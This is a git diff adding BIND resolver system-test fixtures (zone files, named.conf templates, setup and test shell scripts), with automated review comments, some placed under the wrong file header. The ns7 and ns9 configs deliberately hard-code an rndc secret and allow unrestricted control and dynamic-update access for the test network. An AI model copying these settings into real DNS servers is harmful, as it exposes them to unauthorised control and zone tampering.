diff --git a/bin/tests/system/resolver/ns6/root.db b/bin/tests/system/resolver/ns6/root.db new file mode 100644 index 0000000..096381c --- /dev/null +++ b/bin/tests/system/resolver/ns6/root.db @@ -0,0 +1,36 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA marka.isc.org. a.root.servers.nil. ( + 2010 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.6 +a.root-servers.nil. AAAA fd92:7065:b8e:ffff::6 +moves. NS ns.server. +server. NS ns7.server. +ns7.server. A 10.53.0.7 +; +; These two delegations are strictly not necessary as the test resolver (ns5) +; doesn't have this zone as its root. They are just done for consistency with +; the delegations in ns4/tld. +; +no-edns-version.tld. NS ns.no-edns-version.tld. +ns.no-edns-version.tld. A 10.53.0.6 +edns-version.tld. NS ns.edns-version.tld. +ns.edns-version.tld. A 10.53.0.7 +v4only.net. NS v4.nameserver. +v4.nameserver. A 10.53.0.4 diff --git a/bin/tests/system/resolver/ns6/targetns.db b/bin/tests/system/resolver/ns6/targetns.db new file mode 100644 index 0000000..4d9496b --- /dev/null +++ b/bin/tests/system/resolver/ns6/targetns.db 
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+; In the test for checking how many NS records BIND will follow, this
+; zone marks the server as the one to which the NS lookups will be
+; directed.
+
+$TTL 300
+@ IN SOA marka.isc.org. ns.server. (
+ 2010 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+ NS ns
+ns A 10.53.0.6
diff --git a/bin/tests/system/resolver/ns6/tld1.db b/bin/tests/system/resolver/ns6/tld1.db
new file mode 100644
index 0000000..412509b
--- /dev/null
+++ b/bin/tests/system/resolver/ns6/tld1.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ IN SOA ns hostmaster 1 1800 900 604800 600
+@ IN NS ns
+ns IN A 10.53.0.6
+
+$GENERATE 1-21 sub IN NS sub-ns$.tld2.
diff --git a/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in b/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in
new file mode 100644
index 0000000..5638090
--- /dev/null
+++ b/bin/tests/system/resolver/ns6/to-be-removed.tld.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ IN SOA ns hostmaster 1 1800 900 604800 600
+@ IN NS ns
+ns IN A 10.53.0.6
+ns0 IN A 10.53.0.6
+ns1 IN A 10.53.0.6
+ns2 IN A 10.53.0.6
+ns3 IN A 10.53.0.6
+ns4 IN A 10.53.0.6
+ns5 IN A 10.53.0.6
+ns6 IN A 10.53.0.6
+ns7 IN A 10.53.0.6
+ns8 IN A 10.53.0.6
+ns9 IN A 10.53.0.6
+$TTL 1
+@ IN A 10.53.0.6
+www IN A 10.53.0.6
diff --git a/bin/tests/system/resolver/ns7/all-cnames.db b/bin/tests/system/resolver/ns7/all-cnames.db
new file mode 100644
index 0000000..85003ee
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/all-cnames.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA marka.isc.org. ns.server. (
+ 2010 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+@ NS cname.tld.
diff --git a/bin/tests/system/resolver/ns7/edns-version.tld.db b/bin/tests/system/resolver/ns7/edns-version.tld.db
new file mode 100644
index 0000000..bcfae40
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/edns-version.tld.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ SOA . . 0 0 0 0 0
+@ NS ns
+ns A 10.53.0.7
diff --git a/bin/tests/system/resolver/ns7/named1.conf.in b/bin/tests/system/resolver/ns7/named1.conf.in
new file mode 100644
index 0000000..2070ffa
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/named1.conf.in
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS7
+
+options {
+ query-source address 10.53.0.7 dscp 13;
+ notify-source 10.53.0.7 dscp 14;
+ transfer-source 10.53.0.7 dscp 15;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { fd92:7065:b8e:ffff::7; };
+ recursion yes;
+ dnssec-validation yes;
+ empty-zones-enable yes;
+ disable-empty-zone 20.172.in-addr.arpa;
+ /*
+ * check prefetch disabled
+ * check zero ttl not returned
+ */
+ prefetch 0;
+ querylog yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "server" {
+ type primary;
+ file "server.db";
+ allow-update { any; };
+};
+
+zone "edns-version.tld" {
+ type primary;
+ file "edns-version.tld.db";
+};
+
+zone "all-cnames" {
+ type primary;
+ file "all-cnames.db";
+};
+
+zone "tld2" {
+ type primary;
+ file "tld2.db";
+};
+
+zone "sub.tld1" {
+ type primary;
+ file "sub.tld1.db";
+};
diff --git a/bin/tests/system/resolver/ns7/named2.conf.in b/bin/tests/system/resolver/ns7/named2.conf.in
new file mode 100644
index 0000000..2070ffa
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/named2.conf.in
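Review bot: The `key rndc_key` block pins `algorithm hmac-sha256;`, while ns9/named.conf.in in this same commit uses `algorithm @DEFAULT_HMAC@;`. tests.sh drives rndc through common/rndc.conf, which is not shown here; if that file follows the configured default, control-channel authentication against a server with a pinned algorithm would fail whenever the default differs, so `algorithm @DEFAULT_HMAC@;` keeps the fixtures consistent. The same line is in ns7/named2.conf.in. The fixed secret, `controls ... allow { any; }` and `allow-update { any; }` on zone "server" are what the unsigned nsupdate calls in tests.sh need, but a comment above the `key` block such as `// test fixture only: fixed rndc secret and unrestricted control/update access, reachable only on the 10.53.0.x test addresses` would stop the file being reused as a template.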
@@ -0,0 +1,74 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS7
+
+options {
+ query-source address 10.53.0.7 dscp 13;
+ notify-source 10.53.0.7 dscp 14;
+ transfer-source 10.53.0.7 dscp 15;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.7; };
+ listen-on-v6 { fd92:7065:b8e:ffff::7; };
+ recursion yes;
+ dnssec-validation yes;
+ empty-zones-enable yes;
+ disable-empty-zone 20.172.in-addr.arpa;
+ /*
+ * check prefetch disabled
+ * check zero ttl not returned
+ */
+ prefetch 0;
+ querylog yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.7 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "server" {
+ type primary;
+ file "server.db";
+ allow-update { any; };
+};
+
+zone "edns-version.tld" {
+ type primary;
+ file "edns-version.tld.db";
+};
+
+zone "all-cnames" {
+ type primary;
+ file "all-cnames.db";
+};
+
+zone "tld2" {
+ type primary;
+ file "tld2.db";
+};
+
+zone "sub.tld1" {
+ type primary;
+ file "sub.tld1.db";
+};
diff --git a/bin/tests/system/resolver/ns7/root.hint b/bin/tests/system/resolver/ns7/root.hint
new file mode 100644
index 0000000..3337bd5
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/root.hint
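Review bot: ns7/named2.conf.in is added with the same blob id as ns7/named1.conf.in (`index 0000000..2070ffa` on both), so the two files are byte-identical. setup.sh in this commit installs only named1.conf.in as ns7/named.conf, and whatever step switches to named2.conf.in is outside the visible part of tests.sh, so either the second stage is missing its intended difference or the copy is redundant. If the duplicate is deliberate, for example to reload with unchanged content, a header line such as `// NS7, second stage: intentionally identical to named1.conf.in` would record that.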
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.6
diff --git a/bin/tests/system/resolver/ns7/server.db.in b/bin/tests/system/resolver/ns7/server.db.in
new file mode 100644
index 0000000..7d5169a
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/server.db.in
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA marka.isc.org. a.root.servers.nil. (
+ 2010 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+@ NS ns7
+ns7 A 10.53.0.7
+ns A 10.53.0.5
+child NS ns.child
+ns.child A 10.53.0.5
diff --git a/bin/tests/system/resolver/ns7/sub.tld1.db b/bin/tests/system/resolver/ns7/sub.tld1.db
new file mode 100644
index 0000000..b2d46c6
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/sub.tld1.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ IN SOA ns hostmaster 1 1800 900 604800 600
+
+$GENERATE 1-21 @ IN NS sub-ns$.tld2.
+
+$GENERATE 1-21 bar IN NS bar-sub-ns$.tld2.
diff --git a/bin/tests/system/resolver/ns7/tld2.db b/bin/tests/system/resolver/ns7/tld2.db
new file mode 100644
index 0000000..1f31b51
--- /dev/null
+++ b/bin/tests/system/resolver/ns7/tld2.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ IN SOA ns hostmaster 1 1800 900 604800 600
+@ IN NS ns
+ns IN A 10.53.0.7
+
+$GENERATE 1-21 sub-ns$ IN A 10.53.0.7
+$GENERATE 1-21 bar-sub-ns$ IN A 10.53.0.3
diff --git a/bin/tests/system/resolver/ns9/named.args b/bin/tests/system/resolver/ns9/named.args
new file mode 100644
index 0000000..0c66bc0
--- /dev/null
+++ b/bin/tests/system/resolver/ns9/named.args
@@ -0,0 +1,2 @@
+# this server is IPv6 only
+-6 -m record -c named.conf -d 99 -D resolver-ns9 -X named.lock -g -T maxcachesize=2097152
diff --git a/bin/tests/system/resolver/ns9/named.conf.in b/bin/tests/system/resolver/ns9/named.conf.in
new file mode 100644
index 0000000..3be31db
--- /dev/null
+++ b/bin/tests/system/resolver/ns9/named.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS9
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { none; };
+ listen-on-v6 { fd92:7065:b8e:ffff::9; };
+ recursion yes;
+ dnssec-validation yes;
+ dual-stack-servers { fd92:7065:b8e:ffff::7; };
+ qname-minimization off;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm @DEFAULT_HMAC@;
+};
+
+controls {
+ inet fd92:7065:b8e:ffff::9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
diff --git a/bin/tests/system/resolver/ns9/named.ipv6-only b/bin/tests/system/resolver/ns9/named.ipv6-only
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/bin/tests/system/resolver/ns9/named.ipv6-only
diff --git a/bin/tests/system/resolver/ns9/root.hint b/bin/tests/system/resolver/ns9/root.hint
new file mode 100644
index 0000000..f74fbf1
--- /dev/null
+++ b/bin/tests/system/resolver/ns9/root.hint
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.6
+a.root-servers.nil. IN AAAA fd92:7065:b8e:ffff::6;
diff --git a/bin/tests/system/resolver/prereq.sh b/bin/tests/system/resolver/prereq.sh
new file mode 100644
index 0000000..902f8db
--- /dev/null
+++ b/bin/tests/system/resolver/prereq.sh
@@ -0,0 +1,31 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+if $PERL -e 'use Net::DNS;' 2>/dev/null
+then
+ if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION eq "0.76" || $Net::DNS::VERSION eq "0.77");' 2>/dev/null
+ then
+ :
+ else
+ echo_i "Net::DNS version 0.76 and 0.77 have a bug that causes this test to fail: please update." >&2
+ exit 1
+ fi
+else
+ echo_i "This test requires the Net::DNS library." >&2
+ exit 1
+fi
+
+exit 0
diff --git a/bin/tests/system/resolver/setup.sh b/bin/tests/system/resolver/setup.sh
new file mode 100644
index 0000000..0f0832c
--- /dev/null
+++ b/bin/tests/system/resolver/setup.sh
@@ -0,0 +1,28 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+cp ns4/tld1.db ns4/tld.db
+cp ns6/to-be-removed.tld.db.in ns6/to-be-removed.tld.db
+cp ns7/server.db.in ns7/server.db
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named1.conf.in ns7/named.conf
+copy_setports ns9/named.conf.in ns9/named.conf
+
+(cd ns6 && $SHELL keygen.sh)
diff --git a/bin/tests/system/resolver/tests.sh b/bin/tests/system/resolver/tests.sh
new file mode 100755
index 0000000..379b1d7
--- /dev/null
+++ b/bin/tests/system/resolver/tests.sh
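Review bot: Error-exit is requested only on the shebang line (`#!/bin/sh -e`), and that option is honoured only when the file is executed directly; the file is also added with mode 100644, and the last line of this hunk runs a sibling script as `$SHELL keygen.sh`. If setup.sh is started the same way, `-e` is silently dropped and a failing `cp` or `copy_setports` leaves a half-configured server set for the tests to run against. Make the behaviour independent of the launcher by using `#!/bin/sh` and adding `set -e` as the first command after the licence header.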
@@ -0,0 +1,927 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +dig_with_opts() { + "${DIG}" -p "${PORT}" "${@}" +} + +resolve_with_opts() { + "${RESOLVE}" -p "${PORT}" "${@}" +} + +rndccmd() { + "${RNDC}" -c "${SYSTEMTESTTOP}/common/rndc.conf" -p "${CONTROLPORT}" -s "${@}" +} + +status=0 +n=0 + +n=$((n+1)) +echo_i "checking non-cachable NXDOMAIN response handling ($n)" +ret=0 +dig_with_opts +tcp nxdomain.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking non-cachable NXDOMAIN response handling using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 nxdomain.example.net 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: ncache nxdomain" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking that local bound address can be set (Can't query from a denied address) ($n)" + ret=0 + resolve_with_opts -b 10.53.0.8 -t a -s 10.53.0.1 www.example.org 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: SERVFAIL" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) + + n=$((n+1)) + echo_i "checking that local bound address can be set (Can query from an allowed address) ($n)" + ret=0 + resolve_with_opts -b 
10.53.0.1 -t a -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking non-cachable NODATA response handling ($n)" +ret=0 +dig_with_opts +tcp nodata.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking non-cachable NODATA response handling using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 nodata.example.net 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: ncache nxrrset" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking handling of bogus referrals ($n)" +# If the server has the "INSIST(!external)" bug, this query will kill it. +dig_with_opts +tcp www.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking handling of bogus referrals using dns_client ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.example.com 2> resolve.out.ns1.test${n} || ret=1 + grep "resolution failed: SERVFAIL" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "check handling of cname + other data / 1 ($n)" +dig_with_opts +tcp cname1.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "check handling of cname + other data / 2 ($n)" +dig_with_opts +tcp cname2.example.com. 
a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "check that server is still running ($n)" +dig_with_opts +tcp www.example.com. a @10.53.0.1 >/dev/null || { echo_i "failed"; status=$((status + 1)); } + +n=$((n+1)) +echo_i "checking answer IPv4 address filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp www.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking answer IPv6 address filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp www.example.net @10.53.0.1 aaaa > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking answer IPv4 address filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp www.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking answer IPv4 address filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking answer IPv6 address filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp www.example.org @10.53.0.1 aaaa > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking answer IPv6 address filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t 
aaaa -s 10.53.0.1 www.example.org > resolve.out.ns1.test${n} || ret=1 + grep "www.example.org..*.2001:db8:beef::1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking CNAME target filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp badcname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking CNAME target filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp goodcname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking CNAME target filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 goodcname.example.net > resolve.out.ns1.test${n} || ret=1 + grep "goodcname.example.net..*.goodcname.example.org." resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "goodcname.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking CNAME target filtering (accept due to subdomain) ($n)" +ret=0 +dig_with_opts +tcp cname.sub.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking CNAME target filtering using dns_client (accept due to subdomain) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 cname.sub.example.org > resolve.out.ns1.test${n} || ret=1 + grep "cname.sub.example.org..*.ok.sub.example.org." 
resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "ok.sub.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking DNAME target filtering (deny) ($n)" +ret=0 +dig_with_opts +tcp foo.baddname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "DNAME target foo.baddname.example.org denied for foo.baddname.example.net/IN" ns1/named.run >/dev/null || ret=1 +grep "status: SERVFAIL" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +n=$((n+1)) +echo_i "checking DNAME target filtering (accept) ($n)" +ret=0 +dig_with_opts +tcp foo.gooddname.example.net @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking DNAME target filtering using dns_client (accept) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 foo.gooddname.example.net > resolve.out.ns1.test${n} || ret=1 + grep "foo.gooddname.example.net..*.gooddname.example.org" resolve.out.ns1.test${n} > /dev/null || ret=1 + grep "foo.gooddname.example.org..*.192.0.2.1" resolve.out.ns1.test${n} > /dev/null || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=$((status + ret)) +fi + +n=$((n+1)) +echo_i "checking DNAME target filtering (accept due to subdomain) ($n)" +ret=0 +dig_with_opts +tcp www.dname.sub.example.org @10.53.0.1 a > dig.out.ns1.test${n} || ret=1 +grep "status: NOERROR" dig.out.ns1.test${n} > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +if [ -x "${RESOLVE}" ] ; then + n=$((n+1)) + echo_i "checking DNAME target filtering using dns_client (accept due to subdomain) ($n)" + ret=0 + resolve_with_opts -t a -s 10.53.0.1 www.dname.sub.example.org > resolve.out.ns1.test${n} || 
